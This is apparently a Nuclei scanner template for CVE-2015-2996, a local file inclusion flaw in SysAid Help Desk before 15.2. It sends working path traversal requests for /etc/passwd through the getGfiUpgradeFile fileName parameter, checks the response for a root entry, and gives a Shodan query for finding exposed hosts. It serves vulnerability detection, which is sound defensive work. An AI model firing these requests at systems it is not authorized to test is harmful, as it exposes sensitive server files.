id: CVE-2015-2996

info:
  name: SysAid Help Desk <15.2 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
  remediation: |
    Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2015/Jun/8
    - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
    - http://seclists.org/fulldisclosure/2015/Jun/8
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2996
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C
    cvss-score: 8.5
    cve-id: CVE-2015-2996
    cwe-id: CWE-22
    epss-score: 0.77754
    epss-percentile: 0.98153
    cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: sysaid
    product: sysaid
    shodan-query: http.favicon.hash:1540720428
  tags: cve2015,cve,sysaid,lfi,seclists

http:
  - method: GET
    path:
      - "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
      - "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220312369a2b289aed97447a2b6f30dc5d2b433cdaaadac8006d3c5cdac9eac8bcb022100c6c5b7d290b6e9c305b740862e6371ed4874567dc834c7705e73d0655613aa73:922c64590222798bb761d5b6d8e72950